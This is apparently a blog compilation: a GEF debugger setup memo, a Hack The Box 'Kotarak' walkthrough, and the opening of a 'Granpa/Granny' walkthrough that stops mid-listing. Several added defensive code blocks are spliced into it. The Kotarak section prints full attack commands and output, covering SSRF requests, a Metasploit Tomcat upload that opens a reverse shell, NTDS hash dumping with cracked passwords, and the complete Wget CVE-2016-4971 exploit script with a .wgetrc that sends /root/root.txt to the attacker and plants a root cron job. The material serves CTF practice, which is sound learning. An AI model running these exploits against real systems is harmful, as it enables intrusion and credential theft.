Setup memo for GDB Enhanced Features (GEF)

Explanation

GDB Enhanced Features (GEF) is a GDB extension that provides additional commands for dynamic analysis and exploit development.
Setting it up on Kali Linux takes a few steps, and this is a memo of them.

Environment

  • OS: Kali linux 2019.4
  • GDB: gdb (Debian 8.3.1-1) 8.3.1

Solution

1. Initial Setup

The GitHub repository has installation instructions.
However, they did not work in this environment, and the following commands achieve the same purpose.

root@kali:~# git clone https://github.com/hugsy/gef.git

---

root@kali:~# echo source `pwd`/gef/gef.py >> ~/.gdbinit

With the following command, we can confirm that GEF is running.
However, some commands are still missing.

root@kali:~# gdb -q test
GEF for linux ready, type `gef' to start, `gef config' to configure
77 commands loaded for GDB 8.3.1 using Python engine 3.7
[*] 3 commands could not be loaded, run `gef missing` to know why.
Reading symbols from test...
(No debugging symbols found in test)
gef➤  

With the command “gef missing”, we can find the names of the missing commands.

gef➤  gef missing
[*] Command `set-permission` is missing, reason  →  Missing `keystone-engine` package for Python3, install with: `pip3 install keystone-engine`.
[*] Command `ropper` is missing, reason  →  Missing `ropper` package for Python3, install with: `pip3 install ropper`.
[*] Command `assemble` is missing, reason  →  Missing `keystone-engine` package for Python3, install with: `pip3 install keystone-engine`.
gef➤  

Then, install the prerequisites.

root@kali:~# apt-get install cmake

---

root@kali:~# pip3 install keystone-engine ropper unicorn

---

However, some commands are still missing.

gef➤  gef missing
[*] Command `set-permission` is missing, reason  →  Missing `keystone-engine` package for Python3, install with: `pip3 install keystone-engine`.
[*] Command `assemble` is missing, reason  →  Missing `keystone-engine` package for Python3, install with: `pip3 install keystone-engine`.
gef➤  

This time, we need to build keystone manually.
The source code can be downloaded from the release page of the official repository.

root@kali:~# ls -l | grep keystone
-rw-r--r--  1 root root  4326151 Jan 17 02:30 keystone-0.9.1.tar.gz

root@kali:~# tar xzvf keystone-0.9.1.tar.gz 

---

root@kali:~# cd keystone-0.9.1/
root@kali:~/keystone-0.9.1# mkdir build
root@kali:~/keystone-0.9.1# cd build/
root@kali:~/keystone-0.9.1/build# ../make-share.sh

---

root@kali:~/keystone-0.9.1/build# make install

---

root@kali:~/keystone-0.9.1/build# ldconfig

After that, we can confirm that we have no missing commands.

root@kali:~/keystone-0.9.1/build# gdb -q test
GEF for linux ready, type `gef' to start, `gef config' to configure
80 commands loaded for GDB 8.3.1 using Python engine 3.7
Reading symbols from test...
(No debugging symbols found in test)
gef➤  gef missing
[+] No missing command
gef➤ 

Hackthebox Kotarak Walkthrough


Retired date: 2018/03/10

Explanation

Hackthebox is a website that hosts a set of vulnerable machines on its own VPN.
For practice, we are solving the remaining boxes on the list of OSCP-like boxes, and this is a walkthrough of the box “Kotarak”.

Solution

1. Initial Enumeration

TCP Port Scanning:

root@kali:~# nmap -p- 10.10.10.55 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-14 00:42 EET
Nmap scan report for 10.10.10.55
Host is up (0.045s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e2:d7:ca:0e:b7:cb:0a:51:f7:2e:75:ea:02:24:17:74 (RSA)
|   256 e8:f1:c0:d3:7d:9b:43:73:ad:37:3b:cb:e1:64:8e:e9 (ECDSA)
|_  256 6d:e9:26:ad:86:02:2d:68:e1:eb:ad:66:a0:60:17:b8 (ED25519)
8009/tcp  open  ajp13   Apache Jserv (Protocol v1.3)
| ajp-methods:
|   Supported methods: GET HEAD POST PUT DELETE OPTIONS
|   Potentially risky methods: PUT DELETE
|_  See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp  open  http    Apache Tomcat 8.5.5
|_http-favicon: Apache Tomcat
| http-methods:
|_  Potentially risky methods: PUT DELETE
|_http-title: Apache Tomcat/8.5.5 - Error report
60000/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title:         Kotarak Web Hosting
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.28 seconds

root@kali:~#

Gobuster port 8080:

root@kali:~# gobuster dir -u http://10.10.10.55:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt -s '200,204,301,302,403'
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.55:8080/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,php,txt
[+] Timeout:        10s
===============================================================
2020/01/14 01:55:44 Starting gobuster
===============================================================
/docs (Status: 302)
/examples (Status: 302)
/manager (Status: 302)
/RELEASE-NOTES.txt (Status: 200)
===============================================================
2020/01/14 03:01:44 Finished
===============================================================

root@kali:~# 

Gobuster port 60000:

root@kali:~# gobuster dir -u http://10.10.10.55:60000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt -s '200,204,301,302,403'
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.55:60000/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt,html,php
[+] Timeout:        10s
===============================================================
2020/01/14 00:46:42 Starting gobuster
===============================================================
/info.php (Status: 200)
/index.php (Status: 200)
/url.php (Status: 200)
/server-status (Status: 403)
===============================================================
2020/01/14 01:52:27 Finished
===============================================================

root@kali:~# 

2. Getting User

We have two interesting services.
On port 8080, we have Tomcat, and on port 60000, we find a “Private Browser”.

By adding a path parameter, we can view pages of Kotarak that are otherwise forbidden, such as “server-status”.
This means the web application has an SSRF (Server Side Request Forgery) vulnerability, and an attacker can reach internal services through it.
The interesting point is that Kotarak has a service running on “127.0.0.1:888”.
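The root cause above is that url.php forwards any “path” value to a server-side fetch, so “localhost:888” reaches a service bound to 127.0.0.1. The following is an added example of the check such a fetcher needs, not code from the Kotarak box; the function names and the pluggable resolver are my own.

```python
"""Server-side check for a user-supplied fetch URL (the url.php?path= pattern).

Added example, not code from the Kotarak box. The fetcher must re-run this
check on every redirect hop (or not follow redirects at all) and connect to
the address that was validated, otherwise a redirect or a DNS rebind
re-opens the hole.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def default_resolver(hostname):
    """All IPv4/IPv6 addresses a hostname resolves to, as strings."""
    return {info[4][0] for info in socket.getaddrinfo(hostname, None)}


def is_internal(ip):
    """True for addresses a public fetcher should never be steered to."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # "::ffff:127.0.0.1" is still loopback
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_fetch_target(url, resolver=default_resolver):
    """Return (allowed, reason); the first failing rule decides.

    resolver maps a hostname to a set of address strings; the test passes a
    fake one so the check runs without DNS.
    """
    try:
        parts = urlsplit(url.strip())
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    # "localhost:888/?doc=backup" parses with scheme "localhost": a bare
    # host:port string is rejected here instead of being fetched.
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} is not allowed"
    if not parts.hostname:
        return False, "no host in URL"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL are not allowed"
    host = parts.hostname
    try:
        addresses = {ipaddress.ip_address(host)}  # IP literal, no lookup
    except ValueError:
        try:
            addresses = {ipaddress.ip_address(a) for a in resolver(host)}
        except (socket.gaierror, ValueError):
            addresses = set()
    if not addresses:
        return False, f"host {host!r} does not resolve"
    # Reject if *any* answer is internal: a name with mixed answers is a
    # rebinding setup, not a legitimate public host.
    for ip in addresses:
        if is_internal(ip):
            return False, f"{host} resolves to internal address {ip}"
    return True, "ok"
```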

Request to see “http://10.10.10.55:60000”:

http://10.10.10.55:60000/url.php?path=http://localhost:60000/server-status


Then, take a look at “127.0.0.1:888” by sending the following request from the browser.

Request to see “http://10.10.10.55:8888”:

http://10.10.10.55:60000/url.php?path=http://localhost:888


To follow each hyperlink, it seems we need to add the “?doc=backup” parameter.
So, “http://localhost:888/?doc=backup” is the appropriate URL for this link.

root@kali:~# curl -s http://10.10.10.55:60000/url.php?path=http://localhost:888 | grep backup
    <td width="27"><a href="?doc=backup"  class="tableElement"><img src="inc/images/generic.png" alt="dir" width="22" height="22" border="0"></a></td>
    <td class="tableElement"><a href="?doc=backup"  class="tableElement">backup</a></td>

root@kali:~#

Then, try to access the “backup” file on port 888.
It looks like an empty page, but by looking at the source code, we can find a hidden credential.

root@kali:~# curl -s http://10.10.10.55:60000/url.php?path=localhost:888/?doc=backup | grep password
  you must define such a user - the username and password are arbitrary. It is
  them. You will also need to set the passwords to something appropriate.
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
  <user username="role1" password="<must-be-changed>" roles="role1"/>
    <user username="admin" password="3@g01PdhB!" roles="manager,manager-gui,admin-gui,manager-script"/>

root@kali:~#

By going to “http://10.10.10.55:8080/manager/html” and trying a few possible username and password combinations,
we find that the following credential works for Tomcat.

admin:3@g01PdhB!


Since Metasploit has a module for the Tomcat manager, we can use the credential to get a shell as the user “tomcat”.

msf5 > use exploit/multi/http/tomcat_mgr_upload 
msf5 exploit(multi/http/tomcat_mgr_upload) > set httpusername admin
httpusername => admin
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword 3@g01PdhB!
httppassword => 3@g01PdhB!
msf5 exploit(multi/http/tomcat_mgr_upload) > set rhost 10.10.10.55
rhost => 10.10.10.55
msf5 exploit(multi/http/tomcat_mgr_upload) > set rport 8080
rport => 8080
msf5 exploit(multi/http/tomcat_mgr_upload) > run

[*] Started reverse TCP handler on 10.10.14.36:4444 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying 63aGm6...
[*] Executing 63aGm6...
[*] Undeploying 63aGm6 ...
[*] Sending stage (53906 bytes) to 10.10.10.55
[*] Meterpreter session 1 opened (10.10.14.36:4444 -> 10.10.10.55:53600) at 2020-01-14 14:53:18 +0200

meterpreter > getuid
Server username: tomcat

meterpreter > 

It is still not possible to read “user.txt”.
However, we can find some interesting files.

meterpreter > pwd
/home/tomcat/to_archive/pentest_data
meterpreter > ls
Listing: /home/tomcat/to_archive/pentest_data
=============================================

Mode              Size      Type  Last modified              Name
----              ----      ----  -------------              ----
100666/rw-rw-rw-  16793600  fil   2017-07-21 19:16:23 +0300  20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit
100666/rw-rw-rw-  12189696  fil   2017-07-21 19:16:45 +0300  20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin

meterpreter >

We can download these files with the “download” command of the meterpreter shell.

meterpreter > download 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit

---

meterpreter > download 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin

These files look like an NTDS file, the database of Active Directory.
“.dit” stands for “Directory Information Tree”; it stores the hierarchy of network objects and their access permissions.
To confirm what these files are, we can use the “file” command.

root@kali:~# file 2017072111463*
20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit: Extensible storage engine DataBase, version 0x620, checksum 0x16d44752, page size 8192, DirtyShutdown, Windows version 6.1
20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin: MS Windows registry file, NT/2000 or above

root@kali:~#

Since we have an NTDS file and a SYSTEM hive, we can extract the password hashes of the users.
Refer to this article for additional information.

root@kali:~# impacket-secretsdump -system 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin -ntds 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit LOCAL
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Target system bootKey: 0x14b6fb98fedc8e15107867c4722d1399
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: d77ec2af971436bccb3b6fc4a969d7ff
[*] Reading and decrypting hashes from 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-3G2B0H151AC$:1000:aad3b435b51404eeaad3b435b51404ee:668d49ebfdb70aeee8bcaeac9e3e66fd:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ca1ccefcb525db49828fbb9d68298eee:::
WIN2K8$:1103:aad3b435b51404eeaad3b435b51404ee:160f6c1db2ce0994c19c46a349611487:::
WINXP1$:1104:aad3b435b51404eeaad3b435b51404ee:6f5e87fd20d1d8753896f6c9cb316279:::
WIN2K31$:1105:aad3b435b51404eeaad3b435b51404ee:cdd7a7f43d06b3a91705900a592f3772:::
WIN7$:1106:aad3b435b51404eeaad3b435b51404ee:24473180acbcc5f7d2731abe05cfa88c:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
[*] Kerberos keys from 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit 
[*] Cleaning up... 

root@kali:~# 
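The “domain\uid:rid:lmhash:nthash” lines above are the part of a dump a defender should triage before anyone starts cracking. The following is an added example, not part of the original walkthrough: the Administrator, Guest and atanas lines in SAMPLE_DUMP are taken from the output above, and the svc_backup line is constructed (it reuses the Administrator NT hash) to show how password reuse is surfaced.

```python
"""Triage an impacket-secretsdump hash dump (domain\\uid:rid:lmhash:nthash:::).

Added example, not part of the original walkthrough. Status lines and
Kerberos-key lines in the same output do not match the hash-line pattern
and are skipped.
"""
import re
from collections import defaultdict

# NT/LM hashes of the empty string: an LM field equal to EMPTY_LM means no
# LM hash is stored; an NT field equal to EMPTY_NT means a blank password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# First three hash lines are from the dump above; svc_backup is constructed.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
svc_backup:1109:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
[*] Kerberos keys from ntds.dit (constructed status line)
Administrator:aes128-cts-hmac-sha1-96:e2a25474aa9eb0e1525d0f50233c0274
"""

HASH_LINE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_dump(text):
    """Return one dict per hash line; every other line is ignored."""
    records = []
    for line in text.splitlines():
        m = HASH_LINE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["rid"] = int(rec["rid"])
        rec["lm"] = rec["lm"].lower()
        rec["nt"] = rec["nt"].lower()
        rec["machine"] = rec["user"].endswith("$")
        records.append(rec)
    return records


def triage(records):
    """Summarise the hygiene problems a defender wants out of a dump."""
    by_nt = defaultdict(list)
    for rec in records:
        by_nt[rec["nt"]].append(rec["user"])
    return {
        # LM hashes are trivially crackable; they should not be stored at all.
        "lm_hash_stored": [r["user"] for r in records if r["lm"] != EMPTY_LM],
        "blank_password": [r["user"] for r in records if r["nt"] == EMPTY_NT],
        # Same NT hash means same password; one crack opens every account listed.
        "shared_password": {h: users for h, users in by_nt.items()
                            if len(users) > 1 and h != EMPTY_NT},
        # RID 500 is the built-in Administrator, 502 is krbtgt.
        "builtin_privileged": [r["user"] for r in records if r["rid"] in (500, 502)],
        "machine_accounts": [r["user"] for r in records if r["machine"]],
    }
```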

We can crack some of the hashes by using CrackStation.

Now we have the following credentials.

admin:f16tomcat!
atanas:Password123!

Then, switch to the user “atanas”.
This time, the following credential worked.

atanas:f16tomcat!

meterpreter > execute -i -f /bin/bash
Process 3 created.
Channel 3 created.

python -c 'import pty;pty.spawn("/bin/bash")'

tomcat@kotarak-dmz:/$ su atanas
su atanas
Password: f16tomcat!

atanas@kotarak-dmz:/$

“user.txt” is in the directory “/home/atanas”.

atanas@kotarak-dmz:~$ pwd
pwd
/home/atanas

atanas@kotarak-dmz:~$ cat user.txt
cat user.txt
93f844f50491ef797c9c1b601b4bece8

atanas@kotarak-dmz:~$ 

3. Getting Root

Even though “atanas” is an ordinary user, we can look into the “/root” directory as “atanas”.
In that directory, there are two interesting files, “flag.txt” and “app.log”.

flag.txt:

atanas@kotarak-dmz:/root$ cat flag.txt
cat flag.txt
Getting closer! But what you are looking for can't be found here.

atanas@kotarak-dmz:/root$

app.log:

atanas@kotarak-dmz:/root$ cat app.log
cat app.log
10.0.3.133 - - [20/Jul/2017:22:48:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
10.0.3.133 - - [20/Jul/2017:22:50:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
10.0.3.133 - - [20/Jul/2017:22:52:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"

atanas@kotarak-dmz:/root$

It seems that “10.0.3.133” is continuously sending GET requests to this host with Wget 1.16.
By googling the following keywords,
we can find the vulnerability “GNU Wget 1.18 - Arbitrary File Upload / Remote Code Execution”.

wget 1.16 vulnerability
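The app.log observation above (the same path fetched every two minutes by an old Wget) is something a defender can pick out of an access log automatically. The following is an added example, not part of the original walkthrough: the first three SAMPLE_LOG lines are the app.log entries above, the fourth is a constructed non-periodic control, and the function names are my own.

```python
"""Spot periodic fetches by an outdated Wget in an Apache access log.

Added example, not part of the original walkthrough. A client that fetches
the same path on a fixed schedule is a cron job worth knowing about, and a
Wget banner older than 1.18 is one that CVE-2016-4971 (the exploit the
page uses) applies to.
"""
import re
from collections import defaultdict
from datetime import datetime

# First three lines are the app.log entries; the fourth is constructed.
SAMPLE_LOG = """\
10.0.3.133 - - [20/Jul/2017:22:48:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
10.0.3.133 - - [20/Jul/2017:22:50:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
10.0.3.133 - - [20/Jul/2017:22:52:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
10.0.3.7 - - [20/Jul/2017:22:49:30 -0400] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0 (constructed)"
"""

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
WGET_RE = re.compile(r"\bWget/(\d+)\.(\d+)")
WGET_FIXED = (1, 18)  # CVE-2016-4971 was fixed in Wget 1.18


def parse_line(line):
    """Return the fields of one combined-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def wget_version(user_agent):
    """(major, minor) from a Wget User-Agent, or None for other clients."""
    m = WGET_RE.search(user_agent)
    return (int(m.group(1)), int(m.group(2))) if m else None


def find_periodic_fetchers(lines, min_hits=3, jitter_s=5):
    """Group requests by (client, user agent, path) and report the groups
    whose gaps between consecutive requests all agree within jitter_s."""
    groups = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            groups[(rec["client"], rec["ua"], rec["path"])].append(rec["time"])
    findings = []
    for (client, ua, path), times in groups.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if max(gaps) - min(gaps) > jitter_s:
            continue  # bursts or irregular traffic, not a schedule
        ver = wget_version(ua)
        findings.append({
            "client": client,
            "path": path,
            "hits": len(times),
            "period_s": round(sum(gaps) / len(gaps)),
            "user_agent": ua,
            "wget_version": ver,
            "wget_before_1_18": ver is not None and ver < WGET_FIXED,
        })
    return findings
```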

According to the vulnerability description, we have to create a .wgetrc file.

root@kali:~# cat .wgetrc 
post_file = /root/root.txt
output_document = /etc/cron.d/wget-root-shell

root@kali:~# 

After that, install pyftpdlib and launch the FTP server with the following command.

root@kali:~# pip install pyftpdlib

---

root@kali:~# python -m pyftpdlib -p 21 -w
/usr/local/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
  RuntimeWarning)
[I 2020-01-14 18:13:11] >>> starting FTP server on 0.0.0.0:21, pid=111918 <<<
[I 2020-01-14 18:13:11] concurrency model: async
[I 2020-01-14 18:13:11] masquerade (NAT) address: None
[I 2020-01-14 18:13:11] passive ports: None

Also, according to the description, we need a Python script “wget-exploit.py”.

root@kali:~# cat wget-exploit.py 
#!/usr/bin/env python

#
# Wget 1.18 < Arbitrary File Upload Exploit
# Dawid Golunski
# dawid( at )legalhackers.com
#
# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt
#
# CVE-2016-4971 
#

import SimpleHTTPServer
import SocketServer
import socket;

class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
   def do_GET(self):
       # This takes care of sending .wgetrc

       print "We have a volunteer requesting " + self.path + " by GET :)\n"
       if "Wget" not in self.headers.getheader('User-Agent'):
          print "But it's not a Wget :( \n"
          self.send_response(200)
          self.end_headers()
          self.wfile.write("Nothing to see here...")
          return

       print "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n"
       self.send_response(301)
       new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )
       print "Sending redirect to %s \n"%(new_path)
       self.send_header('Location', new_path)
       self.end_headers()

   def do_POST(self):
       # In here we will receive extracted file and install a PoC cronjob

       print "We have a volunteer requesting " + self.path + " by POST :)\n"
       if "Wget" not in self.headers.getheader('User-Agent'):
          print "But it's not a Wget :( \n"
          self.send_response(200)
          self.end_headers()
          self.wfile.write("Nothing to see here...")
          return

       content_len = int(self.headers.getheader('content-length', 0))
       post_body = self.rfile.read(content_len)
       print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body)

       print "Sending back a cronjob script as a thank-you for the file..." 
       print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"
       self.send_response(200)
       self.send_header('Content-type', 'text/plain')
       self.end_headers()
       self.wfile.write(ROOT_CRON)

       print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n"

       return

HTTP_LISTEN_IP = '192.168.57.1'
HTTP_LISTEN_PORT = 80
FTP_HOST = '192.168.57.1'
FTP_PORT = 21

ROOT_CRON = "* * * * * root /usr/bin/id > /root/hacked-via-wget \n"

handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)

print "Ready? Is your FTP server running?"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((FTP_HOST, FTP_PORT))
if result == 0:
   print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)
else:
   print "FTP is down :( Exiting."
   exit(1)

print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT

handler.serve_forever()

However, the above script is a template, and we have to modify the following lines of the script.

root@kali:~# cat -n wget-exploit.py | head -n 65 | tail -n 4
    62	HTTP_LISTEN_IP = ''
    63	HTTP_LISTEN_PORT = 80
    64	FTP_HOST = '10.10.14.36'
    65	FTP_PORT = 21

Then, go to a directory on Kotarak where we have write permission,
and upload the Python script “wget-exploit.py”.

meterpreter > pwd
/tmp
meterpreter > upload ./wget-exploit.py
[*] uploading  : ./wget-exploit.py -> wget-exploit.py
[*] Uploaded -1.00 B of 2.77 KiB (-0.04%): ./wget-exploit.py -> wget-exploit.py
[*] uploaded   : ./wget-exploit.py -> wget-exploit.py

meterpreter > 

Normally, we cannot bind to port 80 as an ordinary user.
However, we can achieve this by using the “authbind” command.
In the POST request, we can see the content of “root.txt”.

atanas@kotarak-dmz:/tmp$ authbind --deep python wget-exploit.py
authbind --deep python wget-exploit.py
Ready? Is your FTP server running?
FTP found open on 10.10.14.36:21. Let's go then

Serving wget exploit on port 80...


We have a volunteer requesting /archive.tar.gz by GET :)

Uploading .wgetrc via ftp redirect vuln. It should land in /root 

10.0.3.133 - - [14/Jan/2020 12:12:01] "GET /archive.tar.gz HTTP/1.1" 301 -
Sending redirect to ftp://anonymous@10.10.14.36:21/.wgetrc 

We have a volunteer requesting /archive.tar.gz by POST :)

Received POST from wget, this should be the extracted /etc/shadow file: 

---[begin]---
 950d1425795dfd38272c93ccbb63ae2c

---[eof]---


Sending back a cronjob script as a thank-you for the file...
It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)
10.0.3.133 - - [14/Jan/2020 12:14:01] "POST /archive.tar.gz HTTP/1.1" 200 -

File was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) 

Output of the local Python FTP server:

root@kali:~# python -m pyftpdlib -p 21 -w
/usr/local/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
  RuntimeWarning)
[I 2020-01-14 19:06:59] >>> starting FTP server on 0.0.0.0:21, pid=115096 <<<
[I 2020-01-14 19:06:59] concurrency model: async
[I 2020-01-14 19:06:59] masquerade (NAT) address: None
[I 2020-01-14 19:06:59] passive ports: None
[I 2020-01-14 19:07:11] 10.10.10.55:54274-[] FTP session opened (connect)
[I 2020-01-14 19:08:35] 10.10.10.55:50788-[] FTP session opened (connect)
[I 2020-01-14 19:08:35] 10.10.10.55:50788-[anonymous] USER 'anonymous' logged in.
[I 2020-01-14 19:08:35] 10.10.10.55:50788-[anonymous] RETR /root/.wgetrc completed=1 bytes=73 seconds=0.002
[I 2020-01-14 19:08:35] 10.10.10.55:50788-[anonymous] FTP session closed (disconnect).

Hackthebox Granpa/Granny Walkthrough


Retired date: 2017/07/07

Explanation

Hackthebox is a website that hosts a set of vulnerable machines on its own VPN.
For practice, we are solving the remaining boxes on the list of OSCP-like boxes, and this is a walkthrough of the box “Granpa”; the same technique works for “Granny” as well.

Solution

1. Initial Enumeration

TCP Port Scanning:

root@kali:~# nmap -p- 10.10.10.14 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-11 15:15 EET
Nmap scan report for 10.10.10.14
Host is up (0.044s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   WebDAV type: Unknown
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Type: Microsoft-IIS/6.0
|_  Server Date: Sat, 11 Jan 2020 13:21:06 GMT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.63 seconds

root@kali:~#

2. Getting User

Nmap revealed only one service: Microsoft IIS version 6 with WebDAV enabled.
Then, google the following keywords.

webdav iis 6 exploit

We can find an exploit, “Microsoft IIS 6.0 - WebDAV ‘ScStoragePathFromUrl’”.
Also, searchsploit finds the same vulnerability in the following way.

root@kali:~# searchsploit iis 6 webdav
------------------------------------------------------------------------------------------ ----------------------------------------
 Exploit Title                                                                            |  Path
                                                                                          | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------ ----------------------------------------
Microsoft IIS - WebDAV Write Access Code Execution (Metasploit)                           | exploits/windows/remote/16471.rb
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (1 | exploits/windows/remote/22365.pl
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (2 | exploits/windows/remote/22366.c
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (3 | exploits/windows/remote/22367.txt
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (4 | exploits/windows/remote/22368.txt
